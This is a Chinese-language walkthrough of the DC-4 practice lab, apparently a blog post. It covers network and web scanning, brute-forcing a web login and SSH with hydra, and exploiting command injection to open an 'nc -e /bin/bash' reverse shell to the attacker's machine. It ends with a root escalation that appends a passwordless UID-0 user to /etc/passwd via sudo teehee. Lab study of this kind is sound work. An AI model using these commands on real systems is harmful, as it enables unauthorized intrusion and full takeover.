主机发现

arp-scan -l
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1 00:50:56:c0:00:08 VMware, Inc.
192.168.100.2 00:50:56:fc:f2:a6 VMware, Inc.
192.168.100.24 00:0c:29:36:b4:4e VMware, Inc.
192.168.100.254 00:50:56:fe:f1:0e VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.964 seconds (130.35 hosts/sec). 4 responded

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-03 21:13 EST
Nmap scan report for 192.168.100.24
Host is up (0.00015s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:36:B4:4E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE
HOP RTT ADDRESS
1 0.15 ms 192.168.100.24 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

浏览器访问

探测站点

┌──(root㉿kali)-[~]
└─# whatweb -v 192.168.100.24
WhatWeb report for http://192.168.100.24
Status : 200 OK
Title : System Tools
IP : 192.168.100.24
Country : RESERVED, ZZ Summary : HTML5, HTTPServer[nginx/1.15.10], nginx[1.15.10], PasswordField[password] Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration [ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header. String : nginx/1.15.10 (from server string) [ PasswordField ]
find password fields String : password (from field name) [ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server. Version : 1.15.10
Website : http://nginx.net/ HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.15.10
Date: Sun, 04 Feb 2024 02:17:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

目录探测

敏感目录探测

┌──(root㉿kali)-[~]
└─# nikto -h 192.168.100.24
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.100.24
+ Target Hostname: 192.168.100.24
+ Target Port: 80
+ Start Time: 2024-02-03 21:23:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-02-03 21:24:04 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.100.24 _|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/_192.168.100.24/_24-02-03_21-24-11.txt Target: http://192.168.100.24/ [21:24:11] Starting:
[21:24:23] 302 - 704B - /command.php -> index.php
[21:24:24] 301 - 170B - /css -> http://192.168.100.24/css/
[21:24:29] 403 - 556B - /images/
[21:24:29] 301 - 170B - /images -> http://192.168.100.24/images/
[21:24:29] 403 - 15B - /index.pHp
[21:24:31] 302 - 206B - /login.php -> index.php
[21:24:31] 302 - 163B - /logout.php -> index.php Task Completed

一开始想到sql注入但是没有找到注入点

爆破

抓包后送到intruder进行爆破用户admin得到密码happy

拿到密码登录



点击commad后发现可能存在任意命令执行漏洞



抓个包,发现ls -l命令是radio参数后的值



改成pwd后放包试试

存在漏洞,有远程代码执行漏洞 可以利用此漏洞进行反弹shell

开起监听

nc -lvvp 8888

弹shell

nc+-e+/bin/bash+192.168.100.251+8888
nc -e /bin/bash 192.168.100.251 8888
# kali IP

开启交互界面

python -c 'import pty;pty.spawn("/bin/sh")'



在home里发现三个人物



只有cd到jim里有内容



backups里面有老密码,mbox不够权限

$ ls
ls
backups mbox test.sh
$ cd backups
cd backups
$ ls
ls
old-passwords.bak
$ cd ..
cd ..
$ cd mbox
cd mbox
/bin/sh: 53: cd: can't cd to mbox

把里面的密码取出来存着先 命名为jim.txt

可以开始爆破了捏

直接使用jim参数用-l!

hydra -l jim -P jim.txt 192.168.100.24 ssh

使用jim登录



查看mbox

jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO This is a test.

是一封邮件

看看jim有没有root权限

jim@dc-4:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things: #1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility. [sudo] password for jim:
Sorry, user jim may not run sudo on dc-4.

很遗憾,没有

linux的邮件目录是/var/spool/mail

看到刚才那封邮件那就查看一下是否存在该目录

发现charls密码^xHhA&hvim0y



转换用户,发现一个teehee用户可以使用root无密码权限



我们可以使用keehee添加root权限用户

echo "yiyi::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

teehee可以通过修改该文件达到添加用户的效果,文件格式为

注册名:口令:用户标识号:组标识号:用户名:用户主目录:命令解析程序

口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限

su yiyi
whoami



进入root目录获取flag

【DC渗透系列DC-4】的更多相关文章

  1. 补充:回答网友的问题,如何不用路径,而直接将CImage画到DC中,之后DC一起显示.

    补充:回答网友的问题,如何不用路径,而直接将CImage画到DC中,之后DC一起显示.注释掉 pDC->BeginPath(); // 打开路径层 pDC->Rectangle(0,0,p ...

  2. 初级AD域渗透系列

      net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admi ...

  3. DC 兼容的DC

    DC是 "Device Content" , MS VC++ 的 MFC图形设备接口 的 设备描述表.它是MFC的主要对象之一.通过CDC类进行各种绘图操作,例如选笔,选色,选涂色 ...

  4. web渗透系列--信息收集

    信息收集对于渗透测试前期来说是非常重要的,因为只有我们掌握了目标网站或目标主机足够多的信息之后,我们才能更好地对其进行漏洞检测.正所谓,知己知彼百战百胜! 信息收集的方式可以分为两种:主动和被动. 主 ...

  5. 萌新学渗透系列之Hack The Box_Devel

    我将我的walkthrough过程用视频解说的形式记载 视频地址https://www.bilibili.com/video/BV1Ck4y1B7DB 一是因为看我视频的后来者应该都是刚入门的新手,视 ...

  6. 萌新学渗透系列之Hack The Box_Legacy

    我将我的walkthrough过程用视频解说的形式记载 视频地址https://www.bilibili.com/video/BV1mZ4y1u7jG 一是因为看我视频的后来者应该都是刚入门的新手,视 ...

  7. 萌新学渗透系列之Hack The Box_Lame

    我将我的walkthrough过程用视频解说的形式记载 视频地址https://www.bilibili.com/video/BV1Mv411z75c 一是因为看我视频的后来者应该都是刚入门的新手,视 ...

  8. VC一些经验系列: 《分享泄漏检测工具:内存、DC、GDI、Handle... 》

    分享下自己工作中用到的一些用于泄漏检测的工具 后面的是DC的一些定义和注意事项.(不喜勿看) //=================================================== ...

  9. (笔记)电路设计(十一)之DC/DC电源转换方案设计应用

    十大 法则之一:搞懂什么是DC/DC电源以及DC/DC转换电路分类 DC/DC电源电路又称为DC/DC转换电路,其主要功能就是进行输入输出电压转换.一般我们把输入电源电压在72V以内的电压变换过程称为 ...

  10. DC/DCT/DCG 差别和联系

    在dc家族系列中,DC_V,DC_E为根本的DC(Design Compiler)对象,具有dc所具有的根本fearture,DC在synopys对象系列中地位,无足轻重,也是业界应用最普遍的综合对象 ...

随机推荐

  1. 【转载】内存基本概念-watermark&lowmem_reserve

    概述 当系统内存短缺的情况下仍去申请内存,可能会触发系统对内存的回收,那什么时候应该进行回收,回收到什么标准又可以停止回收,参考依据是什么?即本文将介绍的watermark(内存水位线),当检查wat ...

  2. HTTP Headers Content-Type 详解

    https://www.cnblogs.com/whosmeya/p/14315632.html

  3. uni-app返回上一级,页面不刷新,bug

    uniapp 生命周期(onLoad跟onLoadonShow的区别) 一.uniapp生命周期分两种 : 1.应用生命周期:仅可在App.vue中监听,在其它页面监听无效. 2.页面生命周期:仅在p ...

  4. freeswitch-1.10.7性能测试

    概述 freeswitch 是一款简单好用的开源软交换平台. freeswitch-1.10.7是比较新的版本,使用时间比较短,需要一个可参考的性能指标,作为实际使用过程中的配置指导. 环境 cent ...

  5. lucene.net全文检索(二)lucene.net 的封装

    查询 public class LuceneQuery : ILuceneQuery { #region Identity private Logger logger = new Logger(typ ...

  6. 解决JedisNoReachableClusterNodeException,No reachable node in cluster报错

    通过jedis连接redis集群时报如下的错误:JedisNoReachableClusterNodeException,No reachable node in cluster 本机连接均正常:   ...

  7. 解决Xshell/Xftp提示“要继续使用此程序必须应用到最新的更新或者新版本”(临时规避和彻底解决方案)

    一.xshell与xftp登录时提示,但是更新却又每次都失败,无法登录 二. 临时规避方案:手动修改日期为1年前,问题解决软件可以打开,但是每次启动都要手动修改,甚是麻烦  三.彻底解决方案,修改xs ...

  8. Clickhouse执行处理查询语句(包括DDL,DML)的过程

    Clickhouse执行处理查询语句(包括DDL,DML)的过程 总体过程 启动线程处理客户端接入的TCP连接: 接收请求数据,交给函数executeQueryImpl()处理: executeQue ...

  9. 05-逻辑仿真工具VCS-执行过程

    Verilog Simulation Event Queue 主要了解VCS是如何处理交给它的代码的 Verilog的仿真事件队列,介绍VCS如何处理交给它的代码.VCS是Synopsys公司的,支持 ...

  10. DataGrip连接MySql数据库失败:dataGrip java.net.ConnectException: Connection refused: connect.

    1.问题 报错:dataGrip java.net.ConnectException: Connection refused: connect. 详细错误:[08S01] Communications ...